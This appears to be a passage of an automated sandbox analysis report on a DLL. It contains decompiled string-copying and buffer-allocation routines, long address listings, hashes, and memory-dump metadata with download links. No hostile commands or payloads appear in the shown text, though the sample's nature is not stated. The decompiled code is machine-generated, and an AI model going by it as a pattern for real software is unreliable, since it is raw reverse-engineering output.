										_t291 = _t463 & 0x0000000f;
										__eflags = _t291;
										if(_t291 == 0) {
											L71:
											_t401 =  ~( ~_t291 + 0x00000007 & 0x00000007) + 0x7fffffff;
											__eflags = _t401;
											while(1) {
												asm("movdqu xmm1, [esi+eax*2]");
												asm("pcmpeqw xmm1, xmm0");
												asm("pmovmskb edi, xmm1");
												__eflags = _t448;
												if(_t448 != 0) {
													break;
												}
												_t291 = _t291 + 8;
												__eflags = _t291 - _t401;
												if(_t291 < _t401) {
													continue;
												} else {
													__eflags = _t401 - 0x7fffffff;
													if(_t401 >= 0x7fffffff) {
														goto L77;
													} else {
														goto L75;
													}
												}
												goto L78;
											}
											asm("bsf edx, edi");
											_t401 = (_t401 >> 1) + _t291;
										} else {
											_t401 = 0;
											__eflags = _t291 & 0x00000001;
											if((_t291 & 0x00000001) != 0) {
												while(1) {
													L75:
													__eflags =  *(_t463 + _t401 * 2) & 0x0000ffff;
													if(( *(_t463 + _t401 * 2) & 0x0000ffff) == 0) {
														goto L78;
													}
													_t401 = _t401 + 1;
													__eflags = _t401 - 0x7fffffff;
													if(_t401 < 0x7fffffff) {
														continue;
													} else {
														L77:
														_t401 = 0x7fffffff;
													}
													goto L78;
												}
											} else {
												_t291 =  ~_t291 + 0x10 >> 1;
												__eflags = _t291;
												while(1) {
													_t448 =  *(_t463 + _t401 * 2) & 0x0000ffff;
													__eflags = _t448;
													if(_t448 == 0) {
														goto L78;
													}
													_t401 = _t401 + 1;
													__eflags = _t401 - _t291;
													if(_t401 < _t291) {
														continue;
													} else {
														goto L71;
													}
													goto L78;
												}
											}
										}
									}
									L78:
									_t264 = _t401 >> 0x0000001f & _t401;
									_t402 = _t401 - _t264;
									__eflags = _t327;
									if(_t327 < 0) {
										L80:
										_t327 = _t402;
									} else {
										__eflags = _t327 - _t402;
										if(_t327 > _t402) {
											goto L80;
										}
									}
									_t403 = _a4;
									_t449 = _t463 + _t264 * 2;
									 *_t403 = 0;
									 *((intOrPtr*)(_t403 + 4)) = 0;
									__eflags = _t449;
									if(_t449 == 0) {
										L116:
										_push(0x80);
										_t317 = E6EA01030();
										_t481 = _t481 + 4;
										_t268 =  *_a4;
										__eflags = _t268;
										if(_t268 == 0) {
											__eflags = 0;
											 *_t317 = 0;
										} else {
											__eflags = _t317;
											if(_t317 != 0) {
												_t404 =  *_t268 & 0x0000ffff;
												 *_t317 = _t404;
												__eflags = _t404;
												if(_t404 != 0) {
													_t405 = 0;
													__eflags = 0;
													while(1) {
														_t405 = _t405 + 1;
														_t359 =  *(_t268 + _t405 * 4 - 2) & 0x0000ffff;
														 *(_t317 + _t405 * 4 - 2) = _t359;
														__eflags = _t359;
														if(_t359 == 0) {
															goto L122;
														}
														_t360 =  *(_t268 + _t405 * 4) & 0x0000ffff;
														 *(_t317 + _t405 * 4) = _t360;
														__eflags = _t360;
														if(_t360 != 0) {
															continue;
														}
														goto L122;
													}
												}
											}
											L122:
											_push(2);
											_push(_t268);
											E6EA010B0();
											_t481 = _t481 + 8;
										}
										goto L124;
									} else {
										_t271 =  *_t449 & 0x0000ffff;
										__eflags = _t271;
										if(_t271 == 0) {
											goto L116;
										} else {
											__eflags = _t327;
											if(_t327 == 0) {
												_t417 = _t449 & 0x0000000f;
												__eflags = _t417;
												if(_t417 == 0) {
													L89:
													_t327 =  ~( ~_t417 + 0x00000007 & 0x00000007) + 0x7fffffff;
													__eflags = _t327;
													while(1) {
														asm("movdqu xmm1, [edi+edx*2]");
														asm("pcmpeqw xmm1, xmm0");
														asm("pmovmskb eax, xmm1");
														__eflags = _t271;
														if(_t271 != 0) {
															break;
														}
														_t417 = _t417 + 8;
														__eflags = _t417 - _t327;
														if(_t417 < _t327) {
															continue;
														} else {
															__eflags = _t327 - 0x7fffffff;
															if(_t327 >= 0x7fffffff) {
																goto L95;
															} else {
																goto L93;
															}
														}
														goto L96;
													}
													asm("bsf ebx, eax");
													_t327 = (_t327 >> 1) + _t417;
												} else {
													_t327 = 0;
													__eflags = _t417 & 0x00000001;
													if((_t417 & 0x00000001) != 0) {
														while(1) {
															L93:
															__eflags =  *(_t449 + _t327 * 2) & 0x0000ffff;
															if(( *(_t449 + _t327 * 2) & 0x0000ffff) == 0) {
																goto L96;
															}
															_t327 = _t327 + 1;
															__eflags = _t327 - 0x7fffffff;
															if(_t327 < 0x7fffffff) {
																continue;
															} else {
																L95:
																_t327 = 0x7fffffff;
															}
															goto L96;
														}
													} else {
														_t417 =  ~_t417 + 0x10 >> 1;
														__eflags = _t417;
														while(1) {
															_t271 =  *(_t449 + _t327 * 2) & 0x0000ffff;
															__eflags = _t271;
															if(_t271 == 0) {
																goto L96;
															}
															_t327 = _t327 + 1;
															__eflags = _t327 - _t417;
															if(_t327 < _t417) {
																continue;
															} else {
																goto L89;
															}
															goto L96;
														}
													}
												}
											}
											L96:
											_t114 = _t327 + 1; // 0x80000000
											_t406 = _t114;
											__eflags = _t406 - 0x40;
											_t407 =  <=  ? 0x40 : _t406;
											__eflags = _t407;
											if(_t407 > 0) {
												_t277 = (_t407 >> 5 >> 0x1a) + _t407 >> 6;
												_t408 = _t407 & 0x8000003f;
												__eflags = _t408;
												if(_t408 < 0) {
													_t408 = (_t408 - 0x00000001 | 0xffffffc0) + 1;
													__eflags = _t408;
												}
												__eflags = _t408;
												_t278 = _t277 + (0 | _t408 > 0x00000000);
												_v68 = _t278 << 6;
												_push(_t278 << 7);
												_t464 = E6EA01030();
												_t481 = _t481 + 4;
												_t411 =  *_a4;
												__eflags = _t411;
												if(_t411 == 0) {
													__eflags = 0;
													 *_t464 = 0;
												} else {
													__eflags = _t464;
													if(_t464 != 0) {
														_t287 =  *_t411 & 0x0000ffff;
														 *_t464 = _t287;
														__eflags = _t287;
														if(_t287 != 0) {
															_t288 = 0;
															__eflags = 0;
															while(1) {
																_t288 = _t288 + 1;
																_t363 =  *(_t411 + _t288 * 4 - 2) & 0x0000ffff;
																 *(_t464 + _t288 * 4 - 2) = _t363;
																__eflags = _t363;
																if(_t363 == 0) {
																	goto L106;
																}
																_t364 =  *(_t411 + _t288 * 4) & 0x0000ffff;
																 *(_t464 + _t288 * 4) = _t364;
																__eflags = _t364;
																if(_t364 != 0) {
																	continue;
																}
																goto L106;
															}
														}
													}
													L106:
													_push(2);
													_push(_t411);
													E6EA010B0();
													_t481 = _t481 + 8;
												}
												_t412 = _a4;
												_t412[1] = _v68;
												 *_t412 = _t464;
											} else {
												_t464 = 0;
											}
											__eflags = _t464;
											if(_t464 != 0) {
												_t284 = 0;
												while(1) {
													_t413 =  *_t449 & 0x0000ffff;
													_t284 = _t284 + 1;
													 *_t464 = _t413;
													__eflags = _t327;
													if(_t327 == 0) {
														goto L114;
													}
													__eflags = _t284 - _t327;
													if(_t284 == _t327) {
														 *(_t464 + 2) = 0;
													} else {
														goto L114;
													}
													goto L125;
													L114:
													__eflags = _t413;
													if(_t413 != 0) {
														_t464 = _t464 + 2;
														_t449 = _t449 + 2;
														__eflags = _t449;
														continue;
													}
													goto L125;
												}
											}
										}
									}
								} else {
									_t426 = _a4;
									_push(0x80);
									 *_t426 = 0;
									 *((intOrPtr*)(_t426 + 4)) = 0;
									_t317 = E6EA01030();
									_t481 = _t481 + 4;
									_t298 =  *_a4;
									__eflags = _t298;
									if(_t298 == 0) {
										 *_t317 = 0;
									} else {
										__eflags = _t317;
										if(_t317 != 0) {
											_t427 =  *_t298 & 0x0000ffff;
											 *_t317 = _t427;
											__eflags = _t427;
											if(_t427 != 0) {
												_t428 = 0;
												__eflags = 0;
												while(1) {
													_t428 = _t428 + 1;
													_t365 =  *(_t298 + _t428 * 4 - 2) & 0x0000ffff;
													 *(_t317 + _t428 * 4 - 2) = _t365;
													__eflags = _t365;
													if(_t365 == 0) {
														goto L63;
													}
													_t366 =  *(_t298 + _t428 * 4) & 0x0000ffff;
													 *(_t317 + _t428 * 4) = _t366;
													__eflags = _t366;
													if(_t366 != 0) {
														continue;
													}
													goto L63;
												}
											}
										}
										L63:
										_push(2);
										_push(_t298);
										E6EA010B0();
										_t481 = _t481 + 8;
									}
									L124:
									_t250 = _a4;
									 *_t250 = _t317;
									_t250[1] = 0x40;
								}
								goto L125;
							}
							L157:
							_t463 = _v40;
							goto L56;
						}
					} else {
						goto L40;
					}
				}
				L125:
				_push(2);
				_push(_v64);
				E6EA010B0();
				_v64 = 0;
				_v60 = 0;
				return _a4;
				goto L180;
			}

0x6ea0ae8e
0x6ea0ae92
0x6ea0ae94
0x6ea0ae98
0x6ea0aea2
0x6ea0aea4
0x6ea0aea7
0x6ea0aead
0x6ea0aee7
0x6ea0aee9
0x6ea0aeaf
0x6ea0aeb1
0x6ea0aeb3
0x6ea0aeb6
0x6ea0aebb
0x6ea0aebf
0x6ea0aebf
0x6ea0aec0
0x6ea0aec5
0x6ea0aecc
0x00000000
0x00000000
0x6ea0aece
0x6ea0aed2
0x6ea0aed8
0x00000000
0x00000000
0x00000000
0x6ea0aed8
0x6ea0aebf
0x6ea0aebb
0x6ea0aeda
0x6ea0aeda
0x6ea0aedc
0x6ea0aedd
0x6ea0aee2
0x6ea0aee2
0x6ea0aef0
0x6ea0aef8
0x6ea0aefe
0x6ea0af09
0x6ea0af0b
0x6ea0b6df
0x6ea0b6e4
0x6ea0af11
0x6ea0af13
0x6ea0af13
0x6ea0af16
0x6ea0af36
0x6ea0af3a
0x6ea0af46
0x6ea0af46
0x6ea0af4c
0x6ea0af4c
0x6ea0af51
0x6ea0af55
0x6ea0af59
0x6ea0af5b
0x00000000
0x00000000
0x6ea0af61
0x6ea0af64
0x6ea0af66
0x00000000
0x6ea0af68
0x6ea0af68
0x6ea0af6e
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0af6e
0x00000000
0x6ea0af66
0x6ea0b6d3
0x6ea0b6d8
0x00000000
0x6ea0af18
0x6ea0af18
0x6ea0af1a
0x6ea0af1c
0x6ea0af70
0x6ea0af70
0x6ea0af74
0x6ea0af76
0x00000000
0x00000000
0x6ea0af7c
0x6ea0af7d
0x6ea0af83
0x00000000
0x6ea0af85
0x6ea0af85
0x6ea0af85
0x6ea0af8a
0x6ea0af8a
0x00000000
0x6ea0af83
0x00000000
0x6ea0af1e
0x6ea0af23
0x6ea0af23
0x6ea0af25
0x6ea0af25
0x6ea0af29
0x6ea0af2b
0x00000000
0x00000000
0x6ea0af31
0x6ea0af32
0x6ea0af34
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0af34
0x6ea0b458
0x6ea0b458
0x6ea0b45b
0x6ea0b46b
0x6ea0b45d
0x6ea0b45f
0x6ea0b462
0x6ea0b462
0x6ea0b45b
0x6ea0af1c
0x6ea0af16
0x6ea0af8f
0x6ea0af94
0x6ea0af94
0x6ea0af97
0x6ea0af9a
0x6ea0af9d
0x6ea0af9f
0x6ea0afb4
0x6ea0afb7
0x6ea0afb7
0x6ea0afbd
0x6ea0afc5
0x6ea0afc5
0x6ea0afc5
0x6ea0afc6
0x6ea0afd0
0x6ea0afd7
0x6ea0afd8
0x6ea0afe0
0x6ea0afe2
0x6ea0afe5
0x6ea0afe9
0x6ea0afeb
0x6ea0b033
0x6ea0b035
0x6ea0afed
0x6ea0afed
0x6ea0afef
0x6ea0aff1
0x6ea0aff4
0x6ea0aff7
0x6ea0aff9
0x6ea0affb
0x6ea0affe
0x6ea0affe
0x6ea0b000
0x6ea0b000
0x6ea0b001
0x6ea0b006
0x6ea0b00b
0x6ea0b00d
0x00000000
0x00000000
0x6ea0b00f
0x6ea0b013
0x6ea0b017
0x6ea0b019
0x00000000
0x00000000
0x00000000
0x6ea0b019
0x6ea0b01b
0x6ea0b01b
0x6ea0aff9
0x6ea0b01e
0x6ea0b020
0x6ea0b021
0x6ea0b025
0x6ea0b02a
0x6ea0b02e
0x6ea0b02e
0x6ea0b038
0x6ea0b03c
0x6ea0afa1
0x6ea0afa1
0x6ea0afa1
0x6ea0b044
0x6ea0b048
0x6ea0b04e
0x6ea0b052
0x6ea0af00
0x6ea0af00
0x6ea0af00
0x6ea0b057
0x6ea0b059
0x6ea0b05f
0x6ea0b068
0x6ea0b068
0x6ea0b06d
0x6ea0b072
0x6ea0b074
0x6ea0b07c
0x6ea0b07e
0x6ea0b084
0x6ea0b088
0x6ea0b0c7
0x6ea0b08a
0x6ea0b08c
0x6ea0b08e
0x6ea0b091
0x6ea0b096
0x6ea0b098
0x6ea0b09a
0x6ea0b09a
0x6ea0b09b
0x6ea0b0a0
0x6ea0b0a7
0x00000000
0x00000000
0x6ea0b0a9
0x6ea0b0ad
0x6ea0b0b3
0x00000000
0x00000000
0x00000000
0x6ea0b0b3
0x6ea0b09a
0x6ea0b096
0x6ea0b0b5
0x6ea0b0b5
0x6ea0b0b7
0x6ea0b0b8
0x6ea0b0bd
0x6ea0b0bd
0x00000000
0x6ea0b061
0x6ea0b061
0x6ea0b066
0x6ea0b0cf
0x6ea0b0d5
0x6ea0b0da
0x6ea0b0dc
0x6ea0b66c
0x6ea0b671
0x6ea0b676
0x6ea0b678
0x6ea0b680
0x6ea0b682
0x6ea0b688
0x6ea0b68a
0x6ea0b68c
0x6ea0b6cb
0x6ea0b68e
0x6ea0b68e
0x6ea0b690
0x6ea0b692
0x6ea0b695
0x6ea0b698
0x6ea0b69a
0x6ea0b69c
0x6ea0b69c
0x6ea0b69e
0x6ea0b69e
0x6ea0b69f
0x6ea0b6a4
0x6ea0b6a9
0x6ea0b6ab
0x00000000
0x00000000
0x6ea0b6ad
0x6ea0b6b1
0x6ea0b6b5
0x6ea0b6b7
0x00000000
0x00000000
0x00000000
0x6ea0b6b7
0x6ea0b69e
0x6ea0b69a
0x6ea0b6b9
0x6ea0b6b9
0x6ea0b6bb
0x6ea0b6bc
0x6ea0b6c1
0x6ea0b6c1
0x00000000
0x6ea0b0e2
0x6ea0b0e6
0x6ea0b0e9
0x6ea0b0ec
0x6ea0b0ef
0x6ea0b0f3
0x6ea0b0f6
0x6ea0b0f9
0x6ea0b10a
0x6ea0b10e
0x6ea0b112
0x6ea0b116
0x6ea0b116
0x6ea0b118
0x6ea0b11c
0x6ea0b11c
0x6ea0b11e
0x6ea0b120
0x6ea0b120
0x6ea0b123
0x00000000
0x00000000
0x6ea0b12d
0x6ea0b12f
0x00000000
0x6ea0b135
0x6ea0b135
0x6ea0b139
0x6ea0b13b
0x6ea0b13e
0x6ea0b13e
0x6ea0b144
0x6ea0b147
0x6ea0b14d
0x6ea0b150
0x6ea0b154
0x6ea0b15b
0x6ea0b15e
0x6ea0b161
0x00000000
0x00000000
0x6ea0b16b
0x6ea0b16d
0x00000000
0x6ea0b16f
0x6ea0b16f
0x6ea0b16f
0x6ea0b172
0x6ea0b172
0x00000000
0x6ea0b16d
0x6ea0b49c
0x6ea0b4a0
0x6ea0b4a4
0x6ea0b4a8
0x6ea0b4ba
0x6ea0b4ba
0x6ea0b4bc
0x6ea0b4be
0x00000000
0x00000000
0x6ea0b4c0
0x6ea0b4c0
0x6ea0b4c2
0x6ea0b4c4
0x6ea0b537
0x6ea0b537
0x6ea0b53b
0x6ea0b53f
0x6ea0b543
0x6ea0b545
0x00000000
0x00000000
0x6ea0b54b
0x6ea0b54c
0x6ea0b552
0x00000000
0x6ea0b554
0x6ea0b554
0x00000000
0x6ea0b554
0x00000000
0x6ea0b552
0x6ea0b64d
0x00000000
0x6ea0b4c6
0x6ea0b4c6
0x6ea0b4ca
0x6ea0b4cc
0x6ea0b4d0
0x6ea0b4d4
0x6ea0b4d8
0x6ea0b4da
0x00000000
0x00000000
0x6ea0b4e0
0x6ea0b4e1
0x6ea0b4e3
0x00000000
0x6ea0b4e5
0x6ea0b4e5
0x6ea0b4e9
0x00000000
0x6ea0b4e9
0x00000000
0x6ea0b4e3
0x6ea0b5c5
0x6ea0b5c9
0x6ea0b5cd
0x6ea0b5cd
0x6ea0b5cf
0x6ea0b558
0x6ea0b558
0x00000000
0x6ea0b5d1
0x6ea0b5d1
0x6ea0b55d
0x6ea0b55d
0x6ea0b561
0x6ea0b561
0x6ea0b563
0x6ea0b567
0x6ea0b56b
0x6ea0b56f
0x6ea0b56f
0x6ea0b57a
0x6ea0b57e
0x6ea0b584
0x6ea0b587
0x6ea0b58d
0x6ea0b593
0x6ea0b596
0x6ea0b599
0x00000000
0x00000000
0x6ea0b59d
0x6ea0b59f
0x6ea0b5ab
0x6ea0b5ab
0x6ea0b5af
0x6ea0b5af
0x6ea0b5b1
0x00000000
0x6ea0b5a1
0x6ea0b5a1
0x6ea0b5a2
0x6ea0b5a6
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0b5a6
0x00000000
0x6ea0b59f
0x6ea0b5e2
0x6ea0b5e6
0x6ea0b5ea
0x6ea0b5f0
0x6ea0b5f0
0x6ea0b5f3
0x00000000
0x6ea0b5f9
0x6ea0b5fd
0x6ea0b5ff
0x00000000
0x6ea0b605
0x6ea0b605
0x6ea0b609
0x6ea0b609
0x6ea0b60b
0x6ea0b60f
0x6ea0b613
0x6ea0b617
0x6ea0b617
0x6ea0b621
0x6ea0b624
0x6ea0b62a
0x6ea0b631
0x6ea0b634
0x6ea0b637
0x6ea0b63a
0x00000000
0x00000000
0x6ea0b644
0x6ea0b646
0x00000000
0x6ea0b648
0x00000000
0x6ea0b648
0x00000000
0x6ea0b646
0x6ea0b4ae
0x6ea0b4b2
0x6ea0b4b6
0x6ea0b4ba
0x6ea0b4bc
0x6ea0b4be
0x00000000
0x00000000
0x6ea0b4be
0x6ea0b5ff
0x6ea0b5d3
0x6ea0b5d3
0x6ea0b5d7
0x6ea0b5d9
0x6ea0b5dd
0x6ea0b5b4
0x6ea0b5b4
0x6ea0b5b6
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0b5b6
0x6ea0b5d1
0x6ea0b5cf
0x00000000
0x6ea0b4ed
0x6ea0b4f9
0x6ea0b4fd
0x6ea0b4fd
0x6ea0b503
0x6ea0b50b
0x6ea0b50b
0x6ea0b510
0x6ea0b514
0x6ea0b518
0x6ea0b51a
0x00000000
0x00000000
0x6ea0b520
0x6ea0b523
0x6ea0b525
0x00000000
0x6ea0b527
0x6ea0b527
0x6ea0b52b
0x6ea0b52f
0x6ea0b535
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0b535
0x00000000
0x6ea0b525
0x6ea0b658
0x6ea0b65d
0x6ea0b661
0x6ea0b663
0x00000000
0x6ea0b663
0x6ea0b4ba
0x6ea0b176
0x6ea0b176
0x6ea0b176
0x6ea0b178
0x6ea0b17a
0x6ea0b1e3
0x6ea0b1e5
0x6ea0b495
0x6ea0b1eb
0x6ea0b1ed
0x6ea0b1ed
0x6ea0b1f0
0x6ea0b20c
0x6ea0b218
0x6ea0b218
0x6ea0b21e
0x6ea0b21e
0x6ea0b223
0x6ea0b227
0x6ea0b22b
0x6ea0b22d
0x00000000
0x00000000
0x6ea0b233
0x6ea0b236
0x6ea0b238
0x00000000
0x6ea0b23a
0x6ea0b23a
0x6ea0b240
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0b240
0x00000000
0x6ea0b238
0x6ea0b489
0x6ea0b48e
0x6ea0b1f2
0x6ea0b1f2
0x6ea0b1f4
0x6ea0b1f6
0x6ea0b242
0x6ea0b242
0x6ea0b246
0x6ea0b248
0x00000000
0x00000000
0x6ea0b24a
0x6ea0b24b
0x6ea0b251
0x00000000
0x6ea0b253
0x6ea0b253
0x6ea0b253
0x6ea0b253
0x00000000
0x6ea0b251
0x6ea0b1f8
0x6ea0b1fd
0x6ea0b1fd
0x6ea0b1ff
0x6ea0b1ff
0x6ea0b203
0x6ea0b205
0x00000000
0x00000000
0x6ea0b207
0x6ea0b208
0x6ea0b20a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0b20a
0x6ea0b1ff
0x6ea0b1f6
0x6ea0b1f0
0x6ea0b258
0x6ea0b25d
0x6ea0b25f
0x6ea0b261
0x6ea0b263
0x6ea0b269
0x6ea0b269
0x6ea0b265
0x6ea0b265
0x6ea0b267
0x00000000
0x00000000
0x6ea0b267
0x6ea0b26b
0x6ea0b26e
0x6ea0b273
0x6ea0b275
0x6ea0b278
0x6ea0b27a
0x6ea0b3d0
0x6ea0b3d0
0x6ea0b3da
0x6ea0b3dc
0x6ea0b3e2
0x6ea0b3e4
0x6ea0b3e6
0x6ea0b420
0x6ea0b422
0x6ea0b3e8
0x6ea0b3e8
0x6ea0b3ea
0x6ea0b3ec
0x6ea0b3ef
0x6ea0b3f2
0x6ea0b3f4
0x6ea0b3f6
0x6ea0b3f6
0x6ea0b3f8
0x6ea0b3f8
0x6ea0b3f9
0x6ea0b3fe
0x6ea0b403
0x6ea0b405
0x00000000
0x00000000
0x6ea0b407
0x6ea0b40b
0x6ea0b40f
0x6ea0b411
0x00000000
0x00000000
0x00000000
0x6ea0b411
0x6ea0b3f8
0x6ea0b3f4
0x6ea0b413
0x6ea0b413
0x6ea0b415
0x6ea0b416
0x6ea0b41b
0x6ea0b41b
0x00000000
0x6ea0b280
0x6ea0b280
0x6ea0b283
0x6ea0b285
0x00000000
0x6ea0b28b
0x6ea0b28b
0x6ea0b28d
0x6ea0b291
0x6ea0b291
0x6ea0b294
0x6ea0b2b1
0x6ea0b2bd
0x6ea0b2bd
0x6ea0b2c3
0x6ea0b2c3
0x6ea0b2c8
0x6ea0b2cc
0x6ea0b2d0
0x6ea0b2d2
0x00000000
0x00000000
0x6ea0b2d8
0x6ea0b2db
0x6ea0b2dd
0x00000000
0x6ea0b2df
0x6ea0b2df
0x6ea0b2e5
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0b2e5
0x00000000
0x6ea0b2dd
0x6ea0b47d
0x6ea0b482
0x6ea0b296
0x6ea0b296
0x6ea0b298
0x6ea0b29b
0x6ea0b2e7
0x6ea0b2e7
0x6ea0b2eb
0x6ea0b2ed
0x00000000
0x00000000
0x6ea0b2ef
0x6ea0b2f0
0x6ea0b2f6
0x00000000
0x6ea0b2f8
0x6ea0b2f8
0x6ea0b2f8
0x6ea0b2f8
0x00000000
0x6ea0b2f6
0x6ea0b29d
0x6ea0b2a2
0x6ea0b2a2
0x6ea0b2a4
0x6ea0b2a4
0x6ea0b2a8
0x6ea0b2aa
0x00000000
0x00000000
0x6ea0b2ac
0x6ea0b2ad
0x6ea0b2af
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0b2af
0x6ea0b2a4
0x6ea0b29b
0x6ea0b294
0x6ea0b2fd
0x6ea0b302
0x6ea0b302
0x6ea0b305
0x6ea0b308
0x6ea0b30b
0x6ea0b30d
0x6ea0b320
0x6ea0b323
0x6ea0b323
0x6ea0b329
0x6ea0b331
0x6ea0b331
0x6ea0b331
0x6ea0b332
0x6ea0b33c
0x6ea0b346
0x6ea0b349
0x6ea0b34f
0x6ea0b351
0x6ea0b357
0x6ea0b359
0x6ea0b35b
0x6ea0b395
0x6ea0b397
0x6ea0b35d
0x6ea0b35d
0x6ea0b35f
0x6ea0b361
0x6ea0b364
0x6ea0b367
0x6ea0b369
0x6ea0b36b
0x6ea0b36b
0x6ea0b36d
0x6ea0b36d
0x6ea0b36e
0x6ea0b373
0x6ea0b378
0x6ea0b37a
0x00000000
0x00000000
0x6ea0b37c
0x6ea0b380
0x6ea0b384
0x6ea0b386
0x00000000
0x00000000
0x00000000
0x6ea0b386
0x6ea0b36d
0x6ea0b369
0x6ea0b388
0x6ea0b388
0x6ea0b38a
0x6ea0b38b
0x6ea0b390
0x6ea0b390
0x6ea0b39a
0x6ea0b3a0
0x6ea0b3a3
0x6ea0b30f
0x6ea0b30f
0x6ea0b30f
0x6ea0b3a5
0x6ea0b3a7
0x6ea0b3ad
0x6ea0b3b7
0x6ea0b3b7
0x6ea0b3ba
0x6ea0b3bb
0x6ea0b3be
0x6ea0b3c0
0x00000000
0x00000000
0x6ea0b3c2
0x6ea0b3c4
0x6ea0b477
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea0b3ca
0x6ea0b3ca
0x6ea0b3cc
0x6ea0b3b1
0x6ea0b3b4
0x6ea0b3b4
0x00000000
0x6ea0b3b4
0x00000000
0x6ea0b3cc
0x6ea0b3b7
0x6ea0b3a7
0x6ea0b285
0x6ea0b17c
0x6ea0b17c
0x6ea0b181
0x6ea0b186
0x6ea0b188
0x6ea0b190
0x6ea0b192
0x6ea0b198
0x6ea0b19a
0x6ea0b19c
0x6ea0b1db
0x6ea0b19e
0x6ea0b19e
0x6ea0b1a0
0x6ea0b1a2
0x6ea0b1a5
0x6ea0b1a8
0x6ea0b1aa
0x6ea0b1ac
0x6ea0b1ac
0x6ea0b1ae
0x6ea0b1ae
0x6ea0b1af
0x6ea0b1b4
0x6ea0b1b9
0x6ea0b1bb
0x00000000
0x00000000
0x6ea0b1bd
0x6ea0b1c1
0x6ea0b1c5
0x6ea0b1c7
0x00000000
0x00000000
0x00000000
0x6ea0b1c7
0x6ea0b1ae
0x6ea0b1aa
0x6ea0b1c9
0x6ea0b1c9
0x6ea0b1cb
0x6ea0b1cc
0x6ea0b1d1
0x6ea0b1d1
0x6ea0b425
0x6ea0b425
0x6ea0b428
0x6ea0b42a
0x6ea0b42a
0x00000000
0x6ea0b17a
0x6ea0b5bc
0x6ea0b5bc
0x00000000
0x6ea0b5bc
0x00000000
0x00000000
0x00000000
0x6ea0b066
0x6ea0b431
0x6ea0b431
0x6ea0b433
0x6ea0b437
0x6ea0b441
0x6ea0b445
0x6ea0b455
0x00000000

Strings

@, xrefs: 6EA0AEF0

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8b23dda31ef708b485797a559140a73a4bae187a5af7111d082972d0fb887ed3
Instruction ID: dd49df65dc3887a4f88651538223e4abd91c09e82ad91ce610ff6b2ab644c3a2
Opcode Fuzzy Hash: 8b23dda31ef708b485797a559140a73a4bae187a5af7111d082972d0fb887ed3
Instruction Fuzzy Hash: 0C424A716047138BD7148FAAD59022A73E2BFC9718F19872DE8A58B39CE734DD81C34A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0B6F0, Relevance: 2.0, Strings: 1, Instructions: 704
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6EA0B6F0(signed int __ecx, void* __eflags, signed int* _a4, signed int _a8) {
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed short* _t217;
				unsigned int _t225;
				signed int _t226;
				signed short** _t231;
				signed short* _t235;
				signed int* _t237;
				signed int _t242;
				signed int _t246;
				signed int _t254;
				signed int _t257;
				signed int _t259;
				signed int _t261;
				signed int _t262;
				intOrPtr* _t263;
				signed int _t266;
				signed int _t269;
				unsigned int _t275;
				signed int _t276;
				void* _t282;
				signed int _t285;
				signed int _t286;
				signed int _t290;
				signed int _t291;
				signed int _t293;
				signed int _t300;
				signed int _t301;
				signed int _t306;
				signed int _t307;
				signed int _t310;
				signed int _t319;
				signed int _t321;
				signed int _t335;
				signed int _t338;
				signed int _t339;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t355;
				void* _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				void* _t368;
				signed int _t369;
				signed int _t370;
				signed int _t373;
				intOrPtr* _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				intOrPtr* _t379;
				signed int _t380;
				signed int _t381;
				signed int _t383;
				unsigned int _t385;
				unsigned int _t386;
				unsigned int _t389;
				signed int _t390;
				signed int _t397;
				signed int _t400;
				signed int _t401;
				void* _t402;
				signed int _t403;
				signed int _t404;
				signed int _t407;
				signed int* _t408;
				signed int _t409;
				signed int _t413;
				signed int _t422;
				signed int _t424;
				signed short* _t425;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int _t438;
				signed int _t444;
				signed int _t446;
				signed int _t448;
				signed int _t451;
				signed int _t452;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				void* _t461;

				_v52 = 0;
				_t438 = __ecx;
				_v48 = 0;
				_push(0x80);
				_t422 = E6EA01030();
				_t461 = (_t458 & 0xfffffff0) - 0x34 + 4;
				_t217 = _v52;
				if(_t217 == 0) {
					__eflags = 0;
					 *_t422 = 0;
					L8:
					_v48 = 0x40;
					_v52 = _t422;
					if((_a8 & 0x0000ffff) != 0) {
						__eflags = _t422;
						if(_t422 == 0) {
							_t338 = 0x40;
							_t300 = 0;
							L23:
							_t24 = _t300 + 2; // 0x80000001
							_t368 = _t24;
							__eflags = _t368 - 0x40;
							_t369 =  <=  ? 0x40 : _t368;
							__eflags = _t338 - _t369;
							if(_t338 < _t369) {
								_t225 = (_t369 >> 5 >> 0x1a) + _t369 >> 6;
								_t370 = _t369 & 0x8000003f;
								__eflags = _t370;
								if(_t370 < 0) {
									_t370 = (_t370 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t370;
								}
								__eflags = _t370;
								_t226 = _t225 + (0 | _t370 > 0x00000000);
								_push(_t226 << 7);
